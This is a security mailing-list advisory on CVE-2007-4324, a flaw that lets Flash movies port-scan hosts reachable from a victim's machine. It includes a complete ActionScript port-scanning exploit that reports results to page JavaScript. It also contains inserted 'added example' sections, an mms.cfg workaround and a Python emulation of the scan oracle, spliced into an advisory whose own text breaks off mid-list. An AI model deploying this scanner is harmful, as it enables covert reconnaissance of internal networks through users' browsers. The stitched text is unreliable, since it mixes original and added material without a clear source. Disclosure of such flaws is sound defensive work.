The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
SUMMARY
Due to a design flaw in ActionScript 3 socket handling, compiled Flash
movies are able to scan for open TCP ports on any host reachable from the
host running the SWF, bypassing the Flash Player Security Sandbox Model
and without the need to rebind DNS.
DETAILS
Vulnerable Systems:
Workaround:
The following instructions reference the mms.cfg configuration file. For
a general introduction to mms.cfg, see the Adobe Flash Player
Administration Guide.
To disable ActionScript socket functionality:
Ensure that Flash Player 9.0.115.0, or later, is installed. Visit the
Adobe Flash Player Download Center to obtain the latest version, or visit
the Adobe Flash Product page to determine the version currently installed.
Find the location of the file mms.cfg on your system(s). This file may
already exist, or you may need to create it. You will most likely need
administrative access to create or edit this file. mms.cfg is located at:
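The directives the steps above lead to, shown here as an added example rather than text from the advisory. `DisableSockets`, `EnableSocketsTo` and `DisableSocketsTo` are the mms.cfg directives documented in the Adobe Flash Player Administration Guide for 9.0.115.0 and later; the host name is a placeholder.

```ini
# mms.cfg fragment (added example). Blocks ActionScript Socket and
# XMLSocket connections for every SWF, which removes the probe primitive
# the exploit below relies on.
DisableSockets = 1

# Optional: re-allow socket connections to individual hosts that really
# need them (placeholder host name, replace with your own).
EnableSocketsTo = intranet-app.example.com
```

With `DisableSockets = 1` in place, `Socket.connect()` fails with a SecurityErrorEvent regardless of whether the target port is open, so the timing difference the scanner measures disappears. Keep the `EnableSocketsTo` list as short as possible, since every host on it is scannable again from any SWF the user loads.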
CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4324>
CVE-2007-4324
Exploit:
package
{
    import flash.display.Sprite;
    import flash.events.Event;
    import flash.events.IOErrorEvent;
    import flash.events.SecurityErrorEvent;
    import flash.events.TimerEvent;
    import flash.external.ExternalInterface;
    import flash.net.Socket;
    import flash.text.TextField;
    import flash.utils.Timer;

    /**
     * The application checks whether the port is reachable from the host
     * the SWF runs on and then calls the JavaScript function "reportResult"
     * with the port number and the port's state (true = open, false = closed).
     */
    public class Main extends Sprite
    {
        // text field for status viewing
        protected var tf:TextField;
        // the socket that tries to connect
        protected var socket:Socket;
        // timer for detecting policy requests that get no answer
        protected var timer:Timer;
        // the host to probe
        protected var host:String;
        // the port to probe
        protected var port:Number;
        // set once a result has been reported, so a late
        // SecurityErrorEvent cannot overwrite an "open" verdict
        protected var done:Boolean = false;

        // Main entry point
        public function Main():void
        {
            // set up the status text field
            tf = new TextField();
            tf.width = 600;
            tf.height = 300;
            addChild(tf);
            // get port from the FlashVars parameters, default 80
            port = parseInt(this.loaderInfo.parameters['port']);
            if (isNaN(port)) {
                port = 80;
            }
            // get host from the FlashVars parameters, default localhost
            host = this.loaderInfo.parameters['host'];
            if (host == null) {
                host = '127.0.0.1';
            }
            // set up the timer. If a port is closed and the Flash plugin is
            // not able to write the "<policy-file-request/>" XML to the
            // socket, it immediately fires a SecurityErrorEvent. If no
            // SecurityErrorEvent arrives within 2 seconds we assume that
            // Flash was able to write the XML to the socket and is waiting
            // for a reply -> the port is open. The timeout can be reduced a
            // lot to make scanning even faster.
            timer = new Timer(2000, 1);
            timer.addEventListener(TimerEvent.TIMER, onTimer);
            probe();
        }

        protected function probe():void
        {
            // show some info text
            tf.appendText('probe host: ' + host + ' port: ' + port);
            // set up the socket and its event listeners
            socket = new Socket();
            // the badly implemented security error is the actual oracle
            socket.addEventListener(SecurityErrorEvent.SECURITY_ERROR, onSecurityError);
            // successful connects should in fact never happen (no policy file)
            socket.addEventListener(Event.CONNECT, onConnect);
            // IO errors should never occur either
            socket.addEventListener(IOErrorEvent.IO_ERROR, onIOError);
            timer.reset();
            timer.start();
            // try to connect
            socket.connect(host, port);
        }

        // no SecurityErrorEvent within the timeout: Flash is waiting for a
        // policy reply, so the port is open
        protected function onTimer(e:TimerEvent):void
        {
            report(true);
        }

        // SecurityErrorEvent fired right away: the TCP connect was refused,
        // so the port is closed
        protected function onSecurityError(e:SecurityErrorEvent):void
        {
            report(false);
        }

        // a real connect (a policy file was served): the port is open
        protected function onConnect(e:Event):void
        {
            report(true);
        }

        // treat an IO error like a refused connection
        protected function onIOError(e:IOErrorEvent):void
        {
            report(false);
        }

        // stop the timer, drop the socket and hand the verdict to the page
        protected function report(open:Boolean):void
        {
            if (done) {
                return;
            }
            done = true;
            timer.stop();
            // Socket.close() throws an IOError on a socket that never connected
            if (socket.connected) {
                socket.close();
            }
            tf.appendText(' -> ' + (open ? 'open' : 'closed') + '\n');
            if (ExternalInterface.available) {
                ExternalInterface.call('reportResult', port, open);
            }
        }
    }
}
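The oracle the SWF above measures, reproduced in plain Python so it can be run without a Flash Player. This is an added example, not code from the advisory or from scan.flashsec.org. Flash Player 9.0.115.0 and later writes "<policy-file-request/>" followed by a NUL byte to the target (after first trying the master policy port 843, which this emulation skips) and waits for a socket-policy XML in reply: a closed port refuses the TCP connection at once, an open one accepts it and leaves the client waiting. The loopback listeners, the permissive sample policy and the timeouts are constructed for the demonstration.

```python
import socket
import threading

# What Flash Player writes to a port before it allows a Socket.connect()
POLICY_REQUEST = b"<policy-file-request/>\x00"

# Constructed socket-policy document in the shape Flash Player expects back
# (NUL-terminated). Deliberately permissive; a real one should be narrow.
SAMPLE_POLICY = (
    b'<?xml version="1.0"?>\n'
    b'<cross-domain-policy>\n'
    b'  <allow-access-from domain="*" to-ports="*"/>\n'
    b'</cross-domain-policy>\x00'
)


def probe(host, port, timeout=2.0):
    """Emulate one Socket.connect() probe. Returns (state, reply):
    ("closed", None)   connect refused at once -> immediate SecurityErrorEvent
    ("filtered", None) no SYN/ACK within the timeout
    ("open", bytes)    connection accepted; reply is what answered the policy
                       request, b"" if the service stayed silent (the case that
                       leaves Flash waiting and lets the SWF's timer fire)
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        try:
            sock.connect((host, port))
        except ConnectionRefusedError:
            return "closed", None
        except socket.timeout:
            return "filtered", None
        sock.sendall(POLICY_REQUEST)
        reply = b""
        try:
            while not reply.endswith(b"\x00"):
                chunk = sock.recv(4096)
                if not chunk:
                    break
                reply += chunk
        except socket.timeout:
            pass  # open port, but nothing spoke the policy protocol
        return "open", reply
    finally:
        sock.close()


def start_listener(reply=None):
    """One-shot TCP listener on 127.0.0.1 (constructed test target); returns
    its port. reply=SAMPLE_POLICY makes it a socket policy server; reply=None
    makes it accept the connection and stay silent like an ordinary service."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.settimeout(5)
            try:
                request = conn.recv(len(POLICY_REQUEST))
                if reply is not None and request == POLICY_REQUEST:
                    conn.sendall(reply)
                elif reply is None:
                    conn.recv(1)  # hold the connection open until the client gives up
            except socket.timeout:
                pass
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def closed_port():
    """Pick a loopback port nothing listens on: bind, read it back, close."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


def scan(host, ports, timeout=2.0):
    """Probe several ports and reduce each result to the open/closed boolean
    the SWF hands to the page's reportResult()."""
    return {p: probe(host, p, timeout)[0] == "open" for p in ports}


if __name__ == "__main__":
    targets = {"policy server": start_listener(SAMPLE_POLICY),
               "silent service": start_listener(None),
               "closed port": closed_port()}
    for label, p in targets.items():
        state, reply = probe("127.0.0.1", p, timeout=1.0)
        extra = f", {len(reply)}-byte policy reply" if reply else ""
        print(f"{label:15} port {p:5}: {state}{extra}")
```

The two "open" outcomes are indistinguishable to the SWF's 2-second timer, which is the whole point: the scanner never needs a policy file, it only needs the SecurityErrorEvent to arrive late. Hosts that must expose raw sockets to Flash content should serve a narrow policy on port 843 rather than per-port, but neither choice stops the scan itself; only `DisableSockets` in mms.cfg does that.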
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]> David
Neu.
The original article can be found at: <http://scan.flashsec.org/>
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.